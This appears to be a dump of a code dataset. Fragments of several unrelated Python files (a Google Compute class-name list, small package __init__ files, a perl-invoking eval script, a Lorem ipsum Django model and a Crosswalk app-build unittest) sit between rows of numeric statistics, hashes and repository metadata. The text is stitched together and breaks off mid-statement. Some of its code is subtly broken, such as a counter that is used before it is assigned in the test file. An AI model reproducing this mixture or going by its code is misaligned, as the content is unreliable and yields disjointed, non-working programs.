"SetProxyHeaderTargetTcpProxyRequest", "SetQuicOverrideTargetHttpsProxyRequest", "SetSchedulingInstanceRequest", "SetSecurityPolicyBackendServiceRequest", "SetServiceAccountInstanceRequest", "SetShieldedInstanceIntegrityPolicyInstanceRequest", "SetSslCertificatesRegionTargetHttpsProxyRequest", "SetSslCertificatesTargetHttpsProxyRequest", "SetSslCertificatesTargetSslProxyRequest", "SetSslPolicyTargetHttpsProxyRequest", "SetSslPolicyTargetSslProxyRequest", "SetTagsInstanceRequest", "SetTargetForwardingRuleRequest", "SetTargetGlobalForwardingRuleRequest", "SetTargetPoolsInstanceGroupManagerRequest", "SetTargetPoolsRegionInstanceGroupManagerRequest", "SetUrlMapRegionTargetHttpProxyRequest", "SetUrlMapRegionTargetHttpsProxyRequest", "SetUrlMapTargetHttpProxyRequest", "SetUrlMapTargetHttpsProxyRequest", "SetUsageExportBucketProjectRequest", "ShieldedInstanceConfig", "ShieldedInstanceIdentity", "ShieldedInstanceIdentityEntry", "ShieldedInstanceIntegrityPolicy", "SignedUrlKey", "SimulateMaintenanceEventInstanceRequest", "Snapshot", "SnapshotList", "SourceInstanceParams", "SslCertificate", "SslCertificateAggregatedList", "SslCertificateList", "SslCertificateManagedSslCertificate", "SslCertificateSelfManagedSslCertificate", "SslCertificatesScopedList", "SSLHealthCheck", "SslPoliciesList", "SslPoliciesListAvailableFeaturesResponse", "SslPolicy", "SslPolicyReference", "StartInstanceRequest", "StartWithEncryptionKeyInstanceRequest", "StatefulPolicy", "StatefulPolicyPreservedState", "StatefulPolicyPreservedStateDiskDevice", "StopInstanceRequest", "Subnetwork", "SubnetworkAggregatedList", "SubnetworkList", "SubnetworkLogConfig", "SubnetworkSecondaryRange", "SubnetworksExpandIpCidrRangeRequest", "SubnetworksScopedList", "SubnetworksSetPrivateIpGoogleAccessRequest", "Subsetting", "SwitchToCustomModeNetworkRequest", "Tags", "TargetGrpcProxy", "TargetGrpcProxyList", "TargetHttpProxiesScopedList", "TargetHttpProxy", "TargetHttpProxyAggregatedList", "TargetHttpProxyList", "TargetHttpsProxiesScopedList", "TargetHttpsProxiesSetQuicOverrideRequest", "TargetHttpsProxiesSetSslCertificatesRequest", "TargetHttpsProxy", "TargetHttpsProxyAggregatedList", "TargetHttpsProxyList", "TargetInstance", "TargetInstanceAggregatedList", "TargetInstanceList", "TargetInstancesScopedList", "TargetPool", "TargetPoolAggregatedList", "TargetPoolInstanceHealth", "TargetPoolList", "TargetPoolsAddHealthCheckRequest", "TargetPoolsAddInstanceRequest", "TargetPoolsRemoveHealthCheckRequest", "TargetPoolsRemoveInstanceRequest", "TargetPoolsScopedList", "TargetReference", "TargetSslProxiesSetBackendServiceRequest", "TargetSslProxiesSetProxyHeaderRequest", "TargetSslProxiesSetSslCertificatesRequest", "TargetSslProxy", "TargetSslProxyList", "TargetTcpProxiesSetBackendServiceRequest", "TargetTcpProxiesSetProxyHeaderRequest", "TargetTcpProxy", "TargetTcpProxyList", "TargetVpnGateway", "TargetVpnGatewayAggregatedList", "TargetVpnGatewayList", "TargetVpnGatewaysScopedList", "TCPHealthCheck", "TestFailure", "TestIamPermissionsDiskRequest", "TestIamPermissionsExternalVpnGatewayRequest", "TestIamPermissionsFirewallPolicyRequest", "TestIamPermissionsImageRequest", "TestIamPermissionsInstanceRequest", "TestIamPermissionsInstanceTemplateRequest", "TestIamPermissionsLicenseCodeRequest", "TestIamPermissionsLicenseRequest", "TestIamPermissionsNetworkEndpointGroupRequest", "TestIamPermissionsNodeGroupRequest", "TestIamPermissionsNodeTemplateRequest", "TestIamPermissionsPacketMirroringRequest", "TestIamPermissionsRegionDiskRequest", "TestIamPermissionsReservationRequest", "TestIamPermissionsResourcePolicyRequest", "TestIamPermissionsServiceAttachmentRequest", "TestIamPermissionsSnapshotRequest", "TestIamPermissionsSubnetworkRequest", "TestIamPermissionsVpnGatewayRequest", "TestPermissionsRequest", "TestPermissionsResponse", "Uint128", "UpdateAccessConfigInstanceRequest", "UpdateAutoscalerRequest", "UpdateBackendBucketRequest", "UpdateBackendServiceRequest", "UpdateDisplayDeviceInstanceRequest", "UpdateFirewallRequest", "UpdateHealthCheckRequest", "UpdateInstanceRequest", "UpdateNetworkInterfaceInstanceRequest", "UpdatePeeringNetworkRequest", "UpdatePerInstanceConfigsInstanceGroupManagerRequest", "UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest", "UpdateRegionAutoscalerRequest", "UpdateRegionBackendServiceRequest", "UpdateRegionHealthCheckRequest", "UpdateRegionUrlMapRequest", "UpdateRouterRequest", "UpdateShieldedInstanceConfigInstanceRequest", "UpdateUrlMapRequest", "UrlMap", "UrlMapList", "UrlMapReference", "UrlMapsAggregatedList", "UrlMapsScopedList", "UrlMapsValidateRequest", "UrlMapsValidateResponse", "UrlMapTest", "UrlMapTestHeader", "UrlMapValidationResult", "UrlRewrite", "UsableSubnetwork", "UsableSubnetworksAggregatedList", "UsableSubnetworkSecondaryRange", "UsageExportLocation", "ValidateRegionUrlMapRequest", "ValidateUrlMapRequest", "VmEndpointNatMappings", "VmEndpointNatMappingsInterfaceNatMappings", "VmEndpointNatMappingsList", "VpnGateway", "VpnGatewayAggregatedList", "VpnGatewayList", "VpnGatewaysGetStatusResponse", "VpnGatewaysScopedList", "VpnGatewayStatus", "VpnGatewayStatusHighAvailabilityRequirementState", "VpnGatewayStatusTunnel", "VpnGatewayStatusVpnConnection", "VpnGatewayVpnGatewayInterface", "VpnTunnel", "VpnTunnelAggregatedList", "VpnTunnelList", "VpnTunnelsScopedList", "WafExpressionSet", "WafExpressionSetExpression", "WaitGlobalOperationRequest", "WaitRegionOperationRequest", "WaitZoneOperationRequest", "Warning", "Warnings", "WeightedBackendService", "XpnHostList", "XpnResourceId", "Zone", "ZoneList", "ZoneSetLabelsRequest", "ZoneSetPolicyRequest", )
33.916275
77
0.793345
2,417
79,398
26.059578
0.508482
0.000953
0.000413
0.000508
0.99257
0.99257
0.99257
0.99257
0.99257
0.99257
0
0.000369
0.147548
79,398
2,340
78
33.930769
0.930234
0.007166
0
0
0
0
0.396622
0.337178
0
0
0
0
0
1
0
false
0.001721
0.00043
0
0.00043
0
0
0
1
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
a83c90482ee8f3e2377f618733f12f1aa51ea1e1
75
py
Python
spartan/model/specgreedy/__init__.py
xyyphant0m/spartan2
6c40247052cdce80c2787c9ee0c5485e218c082d
[ "BSD-3-Clause" ]
50
2020-08-24T15:21:37.000Z
2022-03-09T09:18:17.000Z
spartan/model/specgreedy/__init__.py
xyyphant0m/spartan2
6c40247052cdce80c2787c9ee0c5485e218c082d
[ "BSD-3-Clause" ]
16
2020-08-24T15:20:46.000Z
2021-12-20T03:13:40.000Z
spartan/model/specgreedy/__init__.py
xyyphant0m/spartan2
6c40247052cdce80c2787c9ee0c5485e218c082d
[ "BSD-3-Clause" ]
15
2020-08-24T15:13:16.000Z
2022-02-26T15:25:05.000Z
from .Specgreedy import Specgreedy def __call__(): return Specgreedy
12.5
34
0.76
8
75
6.625
0.75
0
0
0
0
0
0
0
0
0
0
0
0.186667
75
5
35
15
0.868852
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
7
a87c000e1617ea8bb248ef0e27a4380a107775af
162
py
Python
tapis_cli/commands/taccapis/model/v2/__init__.py
bpachev/tapis-cli
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
[ "BSD-3-Clause" ]
8
2020-10-18T22:48:23.000Z
2022-01-10T09:16:14.000Z
tapis_cli/commands/taccapis/model/v2/__init__.py
bpachev/tapis-cli
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
[ "BSD-3-Clause" ]
238
2019-09-04T14:37:54.000Z
2020-04-15T16:24:24.000Z
tapis_cli/commands/taccapis/model/v2/__init__.py
bpachev/tapis-cli
c3128fb5b63ef74e06b737bbd95ef28fb24f0d32
[ "BSD-3-Clause" ]
5
2019-09-20T04:23:49.000Z
2020-01-16T17:45:14.000Z
from .tapismodel import TapisModel from .permission import Permission from .permission import AbacoPermission from .message import Message from .role import Role
27
39
0.845679
20
162
6.85
0.35
0.20438
0.291971
0
0
0
0
0
0
0
0
0
0.123457
162
5
40
32.4
0.964789
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
76810eecf20c01caa10ec0f4caa246bfa2bb6b9b
261
py
Python
eval.py
guitaowufeng/Cross-Domain-CWS
9cb26fbb867684c2ffaf70308b74e8986da22d5a
[ "MIT" ]
14
2018-08-10T06:43:59.000Z
2022-01-09T04:13:40.000Z
eval.py
guitaowufeng/Cross-Domain-CWS
9cb26fbb867684c2ffaf70308b74e8986da22d5a
[ "MIT" ]
1
2019-04-02T04:45:31.000Z
2019-04-19T14:49:23.000Z
eval.py
egrcc/Cross-Domain-CWS
9cb26fbb867684c2ffaf70308b74e8986da22d5a
[ "MIT" ]
2
2018-08-10T06:44:12.000Z
2019-01-04T13:13:47.000Z
import os import sys os.system("perl ./evaluation/score_4 ./evaluation/gold/%s_dict.txt ./evaluation/gold/%s_test.txt ./output/%s_test_%s.txt > ./output/%s_%s_score.txt"\ % (sys.argv[1], sys.argv[2], sys.argv[2], sys.argv[3], sys.argv[2], sys.argv[3]))
52.2
150
0.670498
48
261
3.5
0.375
0.25
0.142857
0.196429
0.238095
0.190476
0
0
0
0
0
0.029787
0.099617
261
5
151
52.2
0.685106
0
0
0
0
0.25
0.527132
0.406977
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
1
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
768b43d91d34db44ab9917b57115db4c36ae85d9
1,513
py
Python
main/models.py
AmanatM/neon-studio
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
[ "MIT" ]
null
null
null
main/models.py
AmanatM/neon-studio
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
[ "MIT" ]
null
null
null
main/models.py
AmanatM/neon-studio
2778ac44cef88e6a9fbdd2eae46b0a028a6d57ca
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class Content(models.Model): title = models.CharField(max_length=50, default='') features_heading = models.CharField(max_length=50, default='Почему мы?') feature_1_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_2_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_3_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_4_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_5_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_6_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_7_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_8_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') feature_9_text = models.CharField(max_length=200, default='Lorem ipsum dolor sit amet, consectetur adipisicing elit. Laudantium, magni?') def __str__(self): return self.title
56.037037
138
0.793787
207
1,513
5.637681
0.227053
0.141388
0.169666
0.226221
0.883462
0.883462
0.826907
0.826907
0.826907
0.826907
0
0.029674
0.109055
1,513
26
139
58.192308
0.836053
0.015863
0
0
0
0
0.46734
0
0
0
0
0
0
1
0.066667
false
0
0.066667
0.066667
1
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
8
4f94efc4ec726d2ce90a2dc3fb86c599b5b4bc3e
185
py
Python
delta_node/entity/__init__.py
delta-mpc/delta-node
674fc61f951e41ed353597f93ca6ea6bc74a102b
[ "Apache-2.0" ]
4
2021-07-22T01:11:15.000Z
2022-03-17T03:26:20.000Z
delta_node/entity/__init__.py
delta-mpc/delta-node
674fc61f951e41ed353597f93ca6ea6bc74a102b
[ "Apache-2.0" ]
10
2021-09-13T09:55:02.000Z
2022-03-23T09:41:26.000Z
delta_node/entity/__init__.py
delta-mpc/delta-node
674fc61f951e41ed353597f93ca6ea6bc74a102b
[ "Apache-2.0" ]
null
null
null
from .base import * from .event import * from .node import * from .task import * from .task_round import * from .round_member import * from .secret_share import * from .record import *
20.555556
27
0.740541
27
185
4.962963
0.407407
0.522388
0.208955
0
0
0
0
0
0
0
0
0
0.172973
185
8
28
23.125
0.875817
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
4fa090bf49541752fb19fe57f6922f5295ddfc43
25,638
py
Python
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
jennycao/crosswalk-test-suite
64874a2941276681cc9823c11dfc024cfe7aac47
[ "BSD-3-Clause" ]
null
null
null
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
jennycao/crosswalk-test-suite
64874a2941276681cc9823c11dfc024cfe7aac47
[ "BSD-3-Clause" ]
null
null
null
apptools/apptools-android-tests/apptools/crosswalk_app_targets.py
jennycao/crosswalk-test-suite
64874a2941276681cc9823c11dfc024cfe7aac47
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python # # Copyright (c) 2016 Intel Corporation. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of works must retain the original copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the original copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of Intel Corporation nor the names of its contributors # may be used to endorse or promote products derived from this work without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT, # INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY # OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: # Yun, Liu<yunx.liu@intel.com> import unittest import os import comm import shutil class TestCrosswalkApptoolsFunctions(unittest.TestCase): def test_create_arm32(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a" (return_create_code, output) = comm.getstatusoutput(cmd) crosswalkVersion = comm.check_crosswalk_version(self, "canary") self.assertEquals(return_create_code, 0) self.assertIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0]) self.assertNotIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0]) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 1) self.assertEquals(armLength, 1) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_create_x8632(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86" (return_create_code, output) = comm.getstatusoutput(cmd) crosswalkVersion = comm.check_crosswalk_version(self, "canary") self.assertEquals(return_create_code, 0) self.assertIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0]) self.assertNotIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0]) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 1) self.assertEquals(armLength, 1) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_create_arm64(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=arm64-v8a" (return_create_code, output) = comm.getstatusoutput(cmd) crosswalkVersion = comm.check_crosswalk_version(self, "canary") self.assertEquals(return_create_code, 0) self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0]) self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0]) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 1) self.assertEquals(arm_64Length, 1) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_create_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64" (return_create_code, output) = comm.getstatusoutput(cmd) crosswalkVersion = comm.check_crosswalk_version(self, "canary") self.assertEquals(return_create_code, 0) self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0]) self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0]) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 1) self.assertEquals(arm_64Length, 1) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_create_arm64_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + ' --android-crosswalk=canary --android-targets="arm64-v8a x86_64"' (return_create_code, output) = comm.getstatusoutput(cmd) crosswalkVersion = comm.check_crosswalk_version(self, "canary") self.assertEquals(return_create_code, 0) self.assertNotIn('crosswalk-{}.zip'.format(crosswalkVersion), output[0]) self.assertIn('crosswalk-{}-64bit.zip'.format(crosswalkVersion), output[0]) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 1) self.assertEquals(arm_64Length, 1) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_create_arm32_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + ' --android-crosswalk=canary --android-targets="armeabi-v7a x86_64"' return_code = os.system(cmd) comm.clear("org.xwalk.test") self.assertNotEquals(return_code, 0) def test_build_arm32(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=armeabi-v7a ./" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 1) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_x8632(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=x86 ./" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 1) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_arm32_x8632(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="armeabi-v7a x86" ./' return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 1) self.assertEquals(armLength, 1) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_arm32_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=armeabi-v7a" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + 'crosswalk-app build --android-targets="armeabi-v7a x86_64" ./' return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 0) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 1) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_arm64(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=arm64-v8a ./" return_code = os.system(buildcmd) apks = os.listdir(os.getcwd()) x86Length = 0 x86_64Length = 0 armLength = 0 arm_64Length = 0 if comm.MODE != " --android-shared": for i in range(len(apks)): if apks[i].endswith(".apk") and "x86" in apks[i]: if "64" in apks[i]: x86_64Length = x86_64Length + 1 else: x86Length = x86Length + 1 if apks[i].endswith(".apk") and "arm" in apks[i]: if "64" in apks[i]: arm_64Length = arm_64Length + 1 else: armLength = armLength + 1 self.assertEquals(x86_64Length, 0) self.assertEquals(arm_64Length, 1) self.assertEquals(x86Length, 0) self.assertEquals(armLength, 0) else: for i in range(len(apks)): if apks[i].endswith(".apk") and "shared" in apks[i]: apkLength = apkLength + 1 self.assertEquals(apkLength, 1) comm.clear("org.xwalk.test") self.assertEquals(return_code, 0) def test_build_x8664(self): comm.setUp() os.chdir(comm.XwalkPath) comm.clear("org.xwalk.test") cmd = comm.HOST_PREFIX + comm.PackTools + \ "crosswalk-app create org.xwalk.test" + comm.MODE + " --android-crosswalk=canary --android-targets=x86_64" os.system(cmd) os.chdir(comm.XwalkPath + 'org.xwalk.test') buildcmd = comm.HOST_PREFIX + comm.PackTools + "crosswalk-app build --android-targets=x86_64 ./" return_code = 